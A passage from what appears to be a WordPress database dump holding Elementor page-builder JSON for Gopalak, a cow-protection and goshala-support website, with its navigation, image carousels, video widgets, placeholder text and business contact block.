url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10515,1752,'_elementor_page_assets','a:0:{}'),(10517,1753,'_elementor_edit_mode','builder'),(10518,1753,'_elementor_template_type','wp-page'),(10519,1753,'_elementor_version','3.7.8'),(10520,1753,'_wp_page_template','elementor_canvas'),(10521,1753,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10522,1753,'_elementor_page_assets','a:0:{}'),(10524,1754,'_elementor_edit_mode','builder'),(10525,1754,'_elementor_template_type','wp-page'),(10526,1754,'_elementor_version','3.7.8'),(10527,1754,'_wp_page_template','elementor_canvas'),(10528,1754,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\